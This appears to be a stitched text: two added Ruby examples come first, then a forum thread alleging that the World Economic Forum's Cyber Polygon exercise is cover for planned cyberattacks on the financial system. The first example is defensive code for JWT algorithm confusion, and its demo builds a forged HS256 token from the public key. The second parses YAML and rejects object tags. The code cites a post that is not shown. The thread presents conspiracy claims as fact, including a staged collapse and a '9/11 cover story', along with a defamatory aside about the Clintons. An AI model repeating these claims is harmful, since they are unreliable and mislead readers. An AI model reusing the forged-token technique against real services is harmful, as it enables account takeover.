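The JWT algorithm-change flaw from the write-up quoted in post #2, shown as the flawed decision beside a verifier pinned to RS256. This is an added example, not code from the post or from the Cyber Polygon service; it uses only Ruby's standard library instead of the jwt gem, all helper names are hypothetical, the key pair is generated for the run, and expiry checks are left out.

```ruby
require 'openssl'
require 'base64'
require 'json'

# Added example, not the game service's code. Helper names are hypothetical.
class InvalidToken < StandardError; end

def b64url(data)
  Base64.urlsafe_encode64(data, padding: false)
end

def sha256
  OpenSSL::Digest.new('SHA256')
end

# Constant-time comparison for MAC values.
def secure_equal?(a, b)
  a.bytesize == b.bytesize && a.bytes.zip(b.bytes).sum { |x, y| x ^ y }.zero?
end

# Builds a compact JWS. Used here only to construct sample tokens.
def sign_token(payload, alg, key)
  input = "#{b64url(JSON.generate({ 'alg' => alg, 'typ' => 'JWT' }))}.#{b64url(JSON.generate(payload))}"
  sig = alg == 'RS256' ? key.sign(sha256, input) : OpenSSL::HMAC.digest(sha256, key, input)
  "#{input}.#{b64url(sig)}"
end

# BEFORE: the same decision the write-up's decode method makes. The alg value
# comes from the token, and for HS256 the key stays a String (the public PEM).
def verify_trusting_header(token, public_key_pem)
  head, body, sig = token.split('.')
  input = "#{head}.#{body}"
  raw_sig = Base64.urlsafe_decode64(sig)
  ok = case JSON.parse(Base64.urlsafe_decode64(head))['alg']
       when 'RS256' then OpenSSL::PKey::RSA.new(public_key_pem).verify(sha256, raw_sig, input)
       when 'HS256' then secure_equal?(OpenSSL::HMAC.digest(sha256, public_key_pem, input), raw_sig)
       else false
       end
  raise InvalidToken, 'bad signature' unless ok
  JSON.parse(Base64.urlsafe_decode64(body))
end

# AFTER: the algorithm is fixed by the verifier. The header is only checked
# against it and never selects the primitive or the key type.
def verify_pinned_rs256(token, public_key_pem)
  parts = token.to_s.split('.')
  raise InvalidToken, 'malformed token' unless parts.length == 3
  header = JSON.parse(Base64.urlsafe_decode64(parts[0]))
  raise InvalidToken, 'unexpected alg' unless header.is_a?(Hash) && header['alg'] == 'RS256'
  key = OpenSSL::PKey::RSA.new(public_key_pem)
  valid = key.verify(sha256, Base64.urlsafe_decode64(parts[2]), "#{parts[0]}.#{parts[1]}")
  raise InvalidToken, 'bad signature' unless valid
  JSON.parse(Base64.urlsafe_decode64(parts[1]))
rescue JSON::ParserError, ArgumentError, OpenSSL::PKey::PKeyError
  raise InvalidToken, 'malformed token'
end

# Runs both verifiers over constructed tokens and returns what each decided.
def demo
  rsa = OpenSSL::PKey::RSA.new(2048) # throwaway key pair for this run
  pem = rsa.public_key.to_pem        # the value the service publishes
  legit = sign_token({ 'user_id' => 1 }, 'RS256', rsa)
  # Constructed regression inputs: an HS256 token keyed with the public PEM
  # text, and a validly signed token whose payload was swapped afterwards.
  confused = sign_token({ 'user_id' => 2 }, 'HS256', pem)
  tampered = legit.sub(/\.[^.]+\./, ".#{b64url(JSON.generate({ 'user_id' => 2 }))}.")
  outcome = lambda do |token|
    verify_pinned_rs256(token, pem)['user_id']
  rescue InvalidToken => e
    "rejected: #{e.message}"
  end
  {
    legit_pinned: outcome.call(legit),
    confused_before: verify_trusting_header(confused, pem)['user_id'],
    confused_pinned: outcome.call(confused),
    tampered_pinned: outcome.call(tampered)
  }
end

puts demo if __FILE__ == $PROGRAM_NAME
```

The same regression inputs are worth keeping in a test suite for any service that publishes its verification key.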
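The YAML import fix from the same write-up, extended into a parsing helper that keeps aliases enabled (as the checker required), refuses object tags, and returns fixed error strings, since the exception message was what carried data out of the service. This is an added example, not code from the post or the service; the function name, size limit, status codes and sample documents are assumptions constructed here.

```ruby
require 'yaml'
require 'base64'

# Added example, not the game service's code. Names and limits are hypothetical.
MAX_YAML_BYTES = 16 * 1024
PETITION_KEYS = %w[title text created_at].freeze

# Returns [http_status, body]. Error bodies are fixed strings: nothing from
# the exception (message or backtrace) is ever echoed back to the client.
def parse_petition_param(encoded)
  raw = Base64.decode64(encoded.to_s)
  # Aliases stay enabled, so cap the input: nested aliases can expand a small
  # document considerably once the result is serialised again.
  return [413, { message: 'petition too large' }] if raw.bytesize > MAX_YAML_BYTES

  # safe_load only builds plain scalars, arrays and hashes; any
  # !ruby/object tag raises Psych::DisallowedClass instead of instantiating.
  doc = YAML.safe_load(raw, aliases: true)
  return [422, { message: 'petition must be a mapping' }] unless doc.is_a?(Hash)
  unless doc['title'].is_a?(String) && doc['text'].is_a?(String)
    return [422, { message: 'title and text must be strings' }]
  end

  # Drop keys the import does not use before they reach the model layer.
  [200, doc.slice(*PETITION_KEYS)]
rescue Psych::DisallowedClass, Psych::BadAlias
  [422, { message: 'unsupported YAML construct' }]
rescue Psych::SyntaxError
  [400, { message: 'invalid YAML' }]
end

# Constructed sample documents.
SAMPLE_WITH_ALIAS = "title: &t Save the park\ntext: *t\nextra: ignored\n"
SAMPLE_WITH_OBJECT_TAG = "--- !ruby/object:Gem::Requirement\nrequirements: []\n"

if __FILE__ == $PROGRAM_NAME
  [SAMPLE_WITH_ALIAS, SAMPLE_WITH_OBJECT_TAG].each do |sample|
    p parse_petition_param(Base64.strict_encode64(sample))
  end
end
```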

  5. Link to Post #3
    Avalon Member palehorse's Avatar
    Join Date
    13th April 2020
    Location
    Gaia
    Language
    English
    Age
    46
    Posts
    1,626
    Thanks
    12,030
    Thanked 11,373 times in 1,568 posts

    Default Re: WEF planning cyber attack on financial system?

    Well.. I am wondering why they are talking about this again!?! It is not new news, that the financial system is weak and may collapse, to be frank I have been hearing this thing since 2011 or even before that, on many occasions when I was connected on IRC servers, there were anonops channels available elsewhere, with many operations daily, things going from DDOS to large corporations to small ones hitting servers like KKK, Al-Qaeda, pedo's websites like Clinton family, non-profit organizations, universities.. and didn't stop there, database hacking was the most requested (and still) using tools like `sqlmap` and `havij` and browser exploitation tools like `beef` also vulns checks and hacking tools from the amazing `rapid7`, I worked as programmer and many times close to the penetration test guy (yeah I know weirdo name), especially when the company didn't want to pay an extra worker (it was part of my job to watch vulnerabilities and patch them), then I had to learn about this stuff to know what the possible threat could be and be ready to mitigate problems if they arise, I got quite acquainted with many of these tools and I can assure you a 100% maybe 200%, almost the entire web is vulnerable (it is a freak show, everything is tested innumerable times), there are so many flaws or call it bugs that the majority are not even documented (some very famous Linux libraries have some major flaws that were never really addressed well, there is band-aids sort of thing) and there are no tools to test them (it is a live thing expanding quickly, very dynamic), what you find in xploits-db websites or CVE is just the tip of the iceberg, most real hackers will never disclose a breach to such systems, they will exploit the breach as much as they can, in other words, they will milk the cow, leave the dead beef behind and go for the next target, many times the "security experts" can't detect all the "daemons" in their system, some are very hard to detect and they are stealth, one really needs to watch closely to find inconsistencies in the files. Remember Stuxnet? The mainstream today call it "Computer program", truth is: it was a hell of a hack, they just have to admit it.

    Most hacks are related to confidential data and if the hacker doesn't warn the company (make a joke of it, some love an audience), the exploit can remain in place for a long time until someone finds it, some of these things are really undetectable. Remember you can't test a vulnerability against something that is not yet available, by the way that's how anti-virus/malware companies make their bucks.
    A very skilled hacker is also a master of patience, some hacking takes years of planning, testing and execution, on the other hand some hacks are quickly done with an insider, I would not call it hacking, but the media does.

    Now back to the banks, have you heard of the "Beirut Bank Job"? Bangladeshi Central Bank hack? SWIFT security breaches? Sonali Bank heist in 2013? In Bangladesh for example the hackers walked away with more than 80 million dollars, the target was 1 billion, but they failed and the FED and CBIAS which are the same **** took the blame (they are supposed to protect the smaller economies, which by the way blindly trust them). All these cases were followed by investigation and they found out that bank employees were probably acting as accomplices, they also have high suspicions of the government of North Korea (Lazarus Group or BeagleBoyz, the FBI claimed to have a name of a North Korean man responsible and he was charged, but never arrested, also their claims have no name, which is very strange) and a ****ing Casino in China owned by a Chinese-Filipino, a few bank employees were arrested but there is no solid case and the money was never recovered. In total there were more than 10 bank heists (hacking since 2013), the companies investigating say almost all have the same patterns of attack.

    quote from the article “Not a Question of If but When“, it says everything.

    A little bit off-topic but may interest someone
    This US show was made in 2015 and all the hacking stuff was researched with real hackers (some anonymous) and based on the ongoing world hacking events of earlier times, because they wanted the most accurate picture of what a hacker world really means, here Mr. Robot brings down the entire economic system with the help of his crew and people.. (the 1% of 1% that like to play God).

    The Plot
    "Elliot, a brilliant but highly unstable young cyber-security engineer and vigilante hacker, becomes a key figure in a complex game of global dominance when he and his shadowy allies try to take down the corrupt corporation he works for."

    If anyone has the time to watch, it is very informative. https://www.imdb.com/title/tt4158110/?ref_=fn_al_tt_1 (it is available in torrents everywhere).

    Also I would like to recommend these podcasts, very informative with people actively working in this industry >>> https://darknetdiaries.com/

    I would not be surprised if the entire thing is staged, and when the next one occurs it will render the entire financial system obsolete, because in fact that's what they want, a great reset.
    Last edited by palehorse; 8th April 2021 at 13:50. Reason: added podcast recommendation
    --
    A chaos to the sense, a Kosmos to the reason.

  6. The Following 10 Users Say Thank You to palehorse For This Post:

    Ba-ba-Ra (8th April 2021), Bill Ryan (11th April 2021), gord (8th April 2021), Gwin Ru (10th July 2021), Harmony (16th July 2021), O Donna (10th April 2021), Reinhard (8th May 2021), Tintin (8th June 2021), TomKat (8th April 2021), toppy (8th April 2021)

  7. Link to Post #4
    Canada Avalon Member TomKat's Avatar
    Join Date
    23rd September 2017
    Posts
    2,616
    Thanks
    2,694
    Thanked 13,328 times in 2,365 posts

    Default Re: WEF planning cyber attack on financial system?

    Quote Posted by palehorse (here)
    Well.. I am wondering why they are talking about this again!?!
    They have to set up the cover story ahead of time. Like they did with 9/11. So that, when it happened, "everybody knew" it was Bin Laden.

  8. The Following 13 Users Say Thank You to TomKat For This Post:

    Ba-ba-Ra (8th April 2021), Bill Ryan (11th April 2021), gord (8th April 2021), Gwin Ru (10th July 2021), Harmony (16th July 2021), lizhekb (11th July 2021), Mashika (10th July 2021), O Donna (10th April 2021), palehorse (8th April 2021), Peace in Oz (11th April 2021), Sue (Ayt) (10th July 2021), Tintin (8th June 2021), toppy (8th April 2021)

  9. Link to Post #5
    Avalon Member Andre's Avatar
    Join Date
    9th July 2010
    Location
    Byron Bay Area
    Language
    English
    Posts
    473
    Thanks
    342
    Thanked 2,518 times in 441 posts

    Default Re: WEF planning cyber attack on financial system?

    Very interesting post. Thanks TomKat! Will look at this more closely when I have some time.
    Our destiny is in our hands. Let us visualise a world of truth, freedom and equality.

  10. The Following 3 Users Say Thank You to Andre For This Post:

    Bill Ryan (11th April 2021), Harmony (16th July 2021), Tintin (8th June 2021)

  11. Link to Post #6
    UK Moderator/Librarian/Administrator Tintin's Avatar
    Join Date
    3rd June 2017
    Location
    Project Avalon library
    Language
    English
    Age
    54
    Posts
    5,420
    Thanks
    64,185
    Thanked 46,345 times in 5,388 posts

    Default Re: WEF planning cyber attack on financial system?

    Israel appears to confirm it carried out cyberattack on Iran nuclear facility

    Is this a part of the exercise I wonder
    “If a man does not keep pace with [fall into line with] his companions, perhaps it is because he hears a different drummer. Let him step to the music which he hears, however measured or far away.” - Thoreau

  12. The Following 7 Users Say Thank You to Tintin For This Post:

    Bill Ryan (11th April 2021), gord (11th April 2021), Gwin Ru (10th July 2021), Harmony (16th July 2021), palehorse (12th April 2021), Snoweagle (7th May 2021), Sunny (14th April 2021)

  13. Link to Post #7
    Canada Avalon Member TomKat's Avatar
    Join Date
    23rd September 2017
    Posts
    2,616
    Thanks
    2,694
    Thanked 13,328 times in 2,365 posts

    Default Re: WEF planning cyber attack on financial system?

    Last night on 60 Minutes, Jerome Powell reiterated that the most concerning threat is a cyber attack on the financial system. They might need to bring down the whole system to bring in the new one.

  14. The Following 6 Users Say Thank You to TomKat For This Post:

    Bill Ryan (10th July 2021), Gwin Ru (10th July 2021), palehorse (13th April 2021), Peace in Oz (13th April 2021), Sérénité (6th May 2021), Tintin (8th June 2021)

  15. Link to Post #8
    UK Avalon Member Sérénité's Avatar
    Join Date
    12th March 2013
    Language
    English
    Posts
    894
    Thanks
    3,644
    Thanked 9,055 times in 868 posts

    Default Re: WEF planning cyber attack on financial system?

    https://sociable.co/technology/prepp...jk_FBfuBBXjF7s

    Prepping for a cyber pandemic: Cyber Polygon 2021 to stage supply chain attack simulation

    The World Economic Forum (WEF) will stage another cyber attack exercise as it continues to prep for a potential cyber pandemic that founder Klaus Schwab says will be worse than the current global crisis.

    The SolarWinds hack served as a wake-up call to the supply chain attack vulnerabilities still present in public and private organizations, and it served as a warning that the next breach could be exponentially worse in spreading through any device connected to the internet.

    Following up on last year’s Cyber Polygon cyber attack exercise and event aimed at preventing a digital pandemic, the WEF has announced that the 2021 edition will be taking place on July 9.

    This year, Cyber Polygon 2021 will simulate a fictional cyber attack with participants from dozens of countries responding to “a targeted supply chain attack on a corporate ecosystem in real time.”

    When Klaus Schwab is involved in anything to do with supply chain issue simulations, you know it’s time to stock up on extra rice!

  16. The Following 8 Users Say Thank You to Sérénité For This Post:

    Bill Ryan (10th July 2021), Gwin Ru (10th July 2021), palehorse (7th May 2021), Peace in Oz (6th May 2021), Reinhard (8th May 2021), Sunny (7th May 2021), Tintin (8th June 2021), TomKat (6th May 2021)

  17. Link to Post #9
    United States On Sabbatical
    Join Date
    30th June 2011
    Location
    The Seat of Corruption
    Age
    44
    Posts
    9,177
    Thanks
    25,610
    Thanked 53,656 times in 8,694 posts

    Default Re: WEF planning cyber attack on financial system?

    Quote Posted by TomKat (here)
    Quote Posted by palehorse (here)
    Well.. I am wondering why they are talking about this again!?!
    They have to set up the cover story ahead of time. Like they did with 9/11. So that, when it happened, "everybody knew" it was Bin Laden.
    in reality it will be Citadel, Vanguard, BlackRock and others fighting each other due to horrible policy and rampant greed, this will happen very soon & scapegoats (besides retail investors) will be needed...

    this seems very like the "russians hacked everything" narrative that went on for the last 5 years or so.

    Quote Posted by TomKat (here)
    Last night on 60 Minutes, Jerome Powell reiterated that the most concerning threat is a cyber attack on the financial system. They might need to bring down the whole system to bring in the new one.
    Or to stop the biggest transfer of wealth the world has ever seen (from the rich to the poor this time though.... and to other rich's)
    Last edited by TargeT; 6th May 2021 at 21:11.
    Hard times create strong men, Strong men create good times, Good times create weak men, Weak men create hard times.
    Where are you?

  18. The Following 11 Users Say Thank You to TargeT For This Post:

    Bill Ryan (10th July 2021), gord (8th May 2021), Gwin Ru (10th July 2021), Mypos (6th May 2021), palehorse (7th May 2021), Peace in Oz (6th May 2021), Reinhard (8th May 2021), Snoweagle (7th May 2021), Sunny (7th May 2021), Tintin (8th June 2021), TomKat (6th May 2021)

  19. Link to Post #10
    Canada Avalon Member TomKat's Avatar
    Join Date
    23rd September 2017
    Posts
    2,616
    Thanks
    2,694
    Thanked 13,328 times in 2,365 posts

    Default Re: WEF planning cyber attack on financial system?

    Maybe the first round of cyber attacks promised by the WEF. Brought down a pipeline feeding the US east coast:

    https://www.msn.com/en-us/news/polit...st/ar-BB1gvwaD

  20. The Following 5 Users Say Thank You to TomKat For This Post:

    Bill Ryan (10th July 2021), Gwin Ru (10th July 2021), mountain_jim (8th June 2021), Sérénité (9th May 2021), Tintin (8th June 2021)

  21. Link to Post #11
    Netherlands Avalon Member ExomatrixTV's Avatar
    Join Date
    23rd September 2011
    Location
    Netherlands
    Language
    English, Dutch, German, Limburgs
    Age
    57
    Posts
    22,586
    Thanks
    30,552
    Thanked 124,906 times in 20,684 posts

    Default Re: WEF planning cyber attack on financial system?

    Quote Peter Orphanides on Fb, (quote):

    "Most people remember the expression: "He who smelt it, dealt it", right? Well, when it comes to the powers that be predicting something bad happening, that's the best rule to operate under.

    The event is scheduled for July, and involves a simulated attack on the financial services and supply sector: This would produce catastrophic results that likely would make the issues that's occurred over the last year seem trivial.

    It would also allow the elites to consolidate their power as they could buy everything up for pennies on the dollar, and use that to exert more of a squeeze on the system: Further, it's easier to rebuild a new system after demolishing the old, rather than modifying the existing system.

    Generally, the only hope of preventing a scenario like this from being implemented is to share the message to as many people as possible, while encouraging them to do the same.

    The faster we react, the better (and the pipeline hack seems to be indicative of a test-run for what they seen to carry out later on) so there's no time like the present.
    Further: Being that this is a global issue, it'd be nice if some protests could be set into motion in places where the WEF has offices (their headquarters are in Cologny, Switzerland)".
    (unquote).
    • From “Event 201” to “Cyber Polygon”: The WEF’s Simulation of a Coming “Cyber Pandemic”
    Last year, the World Economic Forum teamed up with the Russian government and global banks to run a high-profile cyberattack simulation that targeted the financial industry, an actual event that would pave the way for a “reset” of the global economy. The simulation, named Cyber Polygon, may have been more than a typical planning exercise and bears similarities to the WEF-sponsored pandemic simulation Event 201 that briefly preceded the COVID-19 crisis.



    On Wednesday, the World Economic Forum (WEF), along with Russia’s Sberbank and its cybersecurity subsidiary BI.ZONE announced that a new global cyberattack simulation would take place this coming July to instruct participants in “developing secure ecosystems” by simulating a supply-chain cyberattack similar to the recent SolarWinds hack that would “assess the cyber resilience” of the exercise’s participants.

    On the newly updated event website, the simulation, called Cyber Polygon 2021, ominously warns that, given the digitalization trends largely spurred by the COVID-19 crisis, “a single vulnerable link is enough to bring down the entire system, just like the domino effect,” adding that “a secure approach to digital development today will determine the future of humanity for decades to come.”

    The exercise comes several months after the WEF, the “international organization for public-private cooperation” that counts the world’s richest elite among its members, formally announced its movement for a Great Reset, which would involve the coordinated transition to a Fourth Industrial Revolution global economy in which human workers become increasingly irrelevant. This revolution, including its biggest proponent, WEF founder Klaus Schwab, has previously presented a major problem for WEF members and member organizations in terms of what will happen to the masses of people left unemployed by the increasing automation and digitalization in the workplace.

    New economic systems that are digitally based and either partnered with or run by central banks are a key part of the WEF’s Great Reset, and such systems would be part of the answer to controlling the masses of the recently unemployed. As others have noted, these digital monopolies, not just financial services, would allow those who control them to “turn off” a person’s money and access to services if that individual does not comply with certain laws, mandates and regulations.

    The WEF has been actively promoting and creating such systems and has most recently taken to calling its preferred model “stakeholder capitalism.” Though advertised as a more “inclusive” form of capitalism, stakeholder capitalism would essentially fuse the public and private sectors, creating a system much more like Mussolini’s corporatist style of fascism than anything else.

    Yet, to usher in this new and radically different system, the current corrupt system must somehow collapse in its entirety, and its replacement must be successfully marketed to the masses as somehow better than its predecessor. When the world’s most powerful people, such as members of the WEF, desire to make radical changes, crises conveniently emerge—whether a war, a plague, or economic collapse—that enable a “reset” of the system, which is frequently accompanied by a massive upward transfer of wealth.

    In recent decades, such events have often been preceded by simulations that come thick and fast before the very event they were meant to “prevent” takes place. Recent examples include the 2020 US election and COVID-19. One of these, Event 201, was cohosted by the World Economic Forum in October 2019 and simulated a novel coronavirus pandemic that spreads around the world and causes major disruptions to the global economy—just a few weeks before the first case of COVID-19 appeared. Cyber Polygon 2021 is merely the latest such simulation, cosponsored by the World Economic Forum. The forum’s current agenda and its past track record of hosting prophetic simulations demand that the exercise be scrutinized.

    Though Cyber Polygon 2021 is months off, it was preceded by Cyber Polygon 2020, a similar WEF-sponsored simulation that took place last July in which speakers warned of a coming deadly “pandemic” of cyberattacks that would largely target two economic sectors, healthcare and finance. Cyber Polygon 2020 was officially described as “international online training for raising global cyber resilience” and involved many of the world’s biggest tech companies and international authorities, from IBM to INTERPOL. There were also many surprising participants at the event, some of whom have been traditionally seen as opposed to Western imperial interests. For example, the person chosen to open the Cyber Polygon event was the prime minister of the Russian Federation, Mikhail Mishustin, and its main host, BI.ZONE, was a subsidiary of the Russian-government-controlled Sberbank. This suggests that the overused “Russian hacker” narrative may be coming to an end or will soon be switched out for another boogeyman more suitable in light of current political realities.

    Aside from Mishustin, WEF executive director Klaus Schwab and former UK prime minister Tony Blair participated in the Cyber Polygon 2020 event, which is due to be repeated annually and bears many similarities to 2019’s Event 201. Rather than preparing for a potential medical pandemic, Cyber Polygon 2020 focused on preparing for a “cyberpandemic,” one that mainstream media outlets like the New Yorker claim is “already underway.” Given the WEF’s recent simulations, powerful billionaire business owners and bankers appear to be poised to use both physical and digital pandemics to reform our societies according to their own design and for their own benefit.
    • The Architects of Cyber Polygon
    According to Russian cybersecurity firm BI.ZONE, 120 organizations spread over twenty-nine countries took part in the two scenarios that were simulated at Cyber Polygon 2020, with as many as five million people allegedly having watched the livestream in over fifty-seven countries. Like many events that took place in 2020, the Cyber Polygon simulations were conducted online due to COVID-19 restrictions. Together with the World Economic Forum, BI.ZONE, a subsidiary of Sberbank, manages the Cyber Polygon project. Sberbank’s largest shareholder, as of last year, is the Russian government, and it is thus often described by English-language media outlets as a state-controlled bank.

    The 2020 event was launched with an address from the prime minister of the Russian Federation Mishustin, who has a history of courting Western tech companies prior to entering politics. In 1989, Mishustin graduated from Moscow State Technological University (generally known as Stankin) with a qualification in systems engineering. During the 1990s, he worked at the International Computer Club, a nonprofit organization with the goal of “attracting Western advanced information technologies” to Russia. Between 1996 and 1998, Mishustin was the chairman of the board of the ICC, but the company was liquidated in 2016. Between 2010 and 2020, he served as head of the Federal Taxation Service of the Russian Federation. Even though he had never shown any previous political ambitions, on January 16, 2020, he was appointed prime minister of the Russian Federation by an executive order issued by President Putin.

    During Mishustin’s welcoming remarks at the WEF’s Cyber Polygon 2020, the Russian PM warned of the need to create public policy to “strengthen the digital security of critical activities without undermining the benefits from digital transformation in critical sectors that would unnecessarily restrict the use and openness of digital technology.” The statement suggests that “unnecessary restrictions” could become seen as necessary in time.

    Mishustin goes on to explain that Russia’s post-COVID economic recovery will be based on the “increasing digitalization of that economy and government,” adding that “we will drastically increase the number of available digital public services and introduce fundamentally new support measures for digital businesses.” He also stated that “Russia has developed a common national system for identification and the prevention of cyberattacks with the government agency’s information systems linked in the system.” He also addressed the Cyber Polygon audience about the international community needing to come together to prevent a “global cyberfraud pandemic.”

    Sberbank, the largest Russian banking institution and former Soviet savings monopoly, which was originally founded by Nicholas I, was an official host of the Cyber Polygon 2020 event alongside the World Economic Forum. As reported in the Economist in January 2021, the Russian banking giant has begun to reimagine its business in an effort to become a consumer-technology giant. Sberbank has spent around $2 billion on technology and acquisitions, including the acquisition of internet media group Rambler, which it fully acquired in 2020. As late as December 30, 2020, Sberbank acquired Doma.ai, which describes itself as “a convenient real estate management platform.” On June 15, 2020, Sberbank bought 2GIS, a map, navigator, and business directory with over 42 million monthly active users. Sberbank’s twenty-two investments, eleven as the lead investor, include some of the most used services in Russia, and its clear intention is to become a one-stop digital shop for all services. The bank also became the owner of one of the largest data-processing centers in Europe when the South Port data-processing center opened in November 2011, replacing the existing thirty-six regional data centers. Sberbank is set to be the world’s first bank to launch its own cryptocurrency, Sbercoin, and digital finance “ecosystem” this March. It notably announced the coming Sbercoin, a “stablecoin” tied to the Russian ruble, just a few weeks after the Cyber Polygon 2020 exercise.

    Sberbank’s alliance with the WEF and prominence at Cyber Polygon 2020 was underscored at the event during the welcoming remarks delivered by Klaus Schwab. Schwab gave special thanks to Herman Gref, a member of the board of trustees of the World Economic Forum and Sberbank’s CEO, and also issued the following dire warning:
    We all know, but still pay insufficient attention to, the frightening scenario of a comprehensive cyberattack which would bring a complete halt to the power supply, transportation, hospital services, our society as a whole. The COVID-19 crisis would be seen in this respect as a small disturbance in comparison to a major cyberattack. We have to ask ourselves, in such a situation, how could we let this happen despite the fact we had all the information about the possibility and seriousness of a risk attack. Cybercrime and global cooperation should be on the forefront of the global agenda.
    Similar warnings were heard at a 2019 simulation that was also cosponsored by the World Economic Forum, Event 201. Event 201, which simulated a global pandemic just months before the COVID-19 crisis, presciently warned in its official documentation: “The next severe pandemic will not only cause great illness and loss of life but could also trigger major cascading economic and societal consequences that could contribute greatly to global impact and suffering.” In contrast to similar simulations conducted in the past, Event 201 championed a “public-private partnership” approach to combatting pandemics, with a focus on engaging “the private sector in epidemic and outbreak preparedness at the national or regional level.” The WEF is, among other things, a major evangelist for the merging of the public and private sectors globally, describing itself as the “international organization for private-public cooperation.” It is thus unsurprising that their latest disaster simulation, which focuses on cyberattacks, would promote this same agenda.
    • The Speakers at Cyber Polygon 2020
    Aside from Schwab and Mishustin, twenty others took part in Cyber Polygon 2020, including some big names from the top echelons of the political elite. First off, Herman Gref engaged in discussion with former UK prime minister Tony Blair, who has been pushing for digital identity systems for decades. Blair straightforwardly told the CEO of Sberbank that biometric digital identity systems will “inevitably” be the tools that most governments will use to deal with future pandemics. Blair, discussing the coronavirus pandemic with Gref, advocated the harshest of lockdown measures, saying the only alternative to biometric digital identities is to “lockdown the economy.”

    Next, Sebastian Tolstoy, Ericsson’s general director for Eastern Europe, Central Asia, and Russia and current chairman of the Tolstoy Family Foundation in Sweden, dialogued with Alexey Kornya. Kornya is president, CEO, and chairman of the management board of Mobile TeleSystems. He previously worked for PricewaterhouseCoopers and AIG-Brunswick Capital Management at North-West Telecom. Tolstoy and Kornya presented a segment at Cyber Polygon 2020 entitled “Building a Secure Interconnected World: What Is the Role of the Telecom Sector?” in which they discussed the importance of digital communication and connectivity to our modern way of living.

    In the next segment, Nik Gowing, BBC World News presenter between 1996 and 2014 and founder and director of Thinking the Unthinkable, spoke with Vladimir Pozner, journalist and broadcaster, on the subject of “fake news” in a conversation that was actually somewhat refreshing in its arguments and approach.

    Stéphane Duguin, the CEO of the CyberPeace Institute, a Geneva-based company that describes itself as “citizens who seek peace and justice in cyberspace,” then gave a talk to the millions of viewers watching the simulation. The CyberPeace Institute, funded by Microsoft, Facebook, Mastercard, and the Hewlett Foundation, among others, claims to help their customers “increase digital resilience and the capacity to respond to and recover from cyberattacks.” The core backers of the CyberPeace Institute are also among the top backers of the Global Cyber Alliance, which unites the public sectors of the US, UK, and France with multinational corporations and intelligence-linked cybersecurity firms, employing “a coordinated approach and nontraditional collaboration” to “reduce cyber risk.”

    Duguin, who is also on the advisory board of the Global Forum on Cyber Expertise, recently launched the Cyber4Healthcare initiative, a “free” cybersecurity service to healthcare providers fighting the COVID-19 pandemic. The Cyber4Healthcare initiative includes as its main partners BI.ZONE as well as Microsoft and the Global Cyber Alliance. This is yet another suspicious Microsoft-linked free cybersecurity service currently being pitched to and adopted by healthcare providers around the world at a time when warnings of a coming cyberattack on healthcare systems globally are becoming more public.

    Dhanya Thakkar, senior vice president of AMEA at Trend Micro, who advertises himself online as a top ASEAN LinkedIn “cybersecurity influencer,” and Wendi Whitmore, vice president of IBM X-Force Threat Intelligence, next discussed the topic “Know Your Enemy: How Is the Crisis Changing the Cyberthreat Landscape?” IBM’s presence is notable due to the company’s longstanding relationship with the CIA, dating back to the early Cold War. The company has become so entrenched that the CIA recently recruited their chief information officer directly from IBM Federal. Before joining IBM, Whitmore held executive positions at California-based cybersecurity technology companies CrowdStrike and Mandiant, the latter acquired by FireEye in a stock and cash deal worth in excess of $1 billion. Whitmore was responsible for “professional services.” Notably, both CrowdStrike and Mandiant/FireEye are the key organizations leading the investigation into the recent SolarWinds hack, which US intelligence has blamed on a “Russian hacker” without providing any evidence. Whitmore began her career as a special agent conducting computer crime investigations with the Air Force Office of Special Investigations.

    Jacqueline Kernot, the Australian “partner in cybersecurity” for Ernst and Young, and Hector Rodriguez, senior vice president and regional risk officer for Visa, next discussed how to prepare for cyberattacks. Kernot worked for over twenty-five years as a military officer for the Australian Intelligence Corps and spent two years working at IBM’s Defence|Space|Intelligence for Tivoli Software in the UK with “international responsibilities within the UK Ministry of Defence, Defence Primes, and NATO.” Ernst and Young and Visa, alongside other WEF-linked corporations such as Salesforce, are well represented on the Vatican’s exclusive Council for Inclusive Capitalism. The Council, like the WEF, calls for the reconstruction of the economic system to be more “sustainable,” “inclusive,” and “dynamic” by “harnessing the power of the private sector.”

    Troels Ørting Jørgensen, chairman of the advisory board of the World Economic Forum’s Centre for Cybersecurity, and Jürgen Stock, the Danish secretary general of INTERPOL, also spoke together at Cyber Polygon regarding the changes in global cybercrime over the course of the previous year. A few months after appearing at Cyber Polygon, the Danish Financial Supervisory Authority announced in an official statement that “Troels Ørting has notified the Ministry of Business Affairs that he is resigning from the Danish Financial Supervisory Authority’s board.” Citing unnamed sources, Danish financial news service FinansWatch reported that during the time between 2015 and 2018, when he was employed as head of security at Barclays bank, Ørting had been a key figure in the hunt for a whistleblower who had exposed the same criminal activity Ørting railed against at Cyber Polygon.

    The man speaking alongside Ørting, Jürgen Stock, is a former German police officer, criminologist, and lawyer. He was elected for a second term as secretary general of INTERPOL in 2019, a term that generally lasts for five years. Craig Jones, the cybercrime director at INTERPOL, also joined the discussion at Cyber Polygon 2020. The New Zealander spent twenty-seven years in law enforcement and is considered an expert in cybercrime investigations. He previously held several senior-management positions in UK law enforcement, most recently at the National Crime Agency.
    Petr Gorodov and John Crain were briefly interviewed at the Cyber Polygon 2020 event. Gorodov is head of the General Directorate for International Relations and Legal Assistance of the Prosecutor General’s Office of the Russian Federation and also sits on the Commission for the Control of INTERPOL’s files. He is on the Requests Chamber of INTERPOL, which examines and decides on requests for access to data as well as requests for correction and/or deletion of data processed in the INTERPOL information system. John Crain is chief security, stability, and resiliency officer at ICANN, the nonprofit internet security corporation. He is currently responsible for the management of the L-Root server, one of the internet’s thirteen root servers, making his inclusion at the simulation particularly notable. At Cyber Polygon 2020 he promoted a “long-term solution of working together in the cybersecurity community.”

    The final word at Cyber Polygon 2020 was delivered by Stanislav Kuznetsov, deputy chairman of the executive board at Sberbank. He is also a board member for the Sberbank charity foundation Contribution to the Future, a project that seeks to get Russian schoolchildren from grades seven through eleven interested in AI (artificial intelligence), machine learning, and data analysis and to help them develop math and programming skills. Kuznetsov studied at the Law Institute of the Ministry of Internal Affairs of the Russian Federation.
    • The Main Event: Enter the Polygon
    Participants in the Cyber Polygon 2020 event, Source: cyberpolygon.com

    The simulation component of Cyber Polygon 2020 saw 120 teams from twenty-nine countries take part in the cybersecurity technical simulation. During the online event, participants “exercise[d] the actions of the response team in a targeted attack aimed at stealing confidential data and thus resulting in damage to the company reputation.” Two teams, the Red and the Blue, went head-to-head in the simulations where the Red Team, made up of the training organizers from BI.ZONE, simulated cyberattacks and the Blue Team members attempted to protect their segments of the training infrastructure. The actual simulation was made up of two scenarios in which the various subgroups making up the teams could gain points.

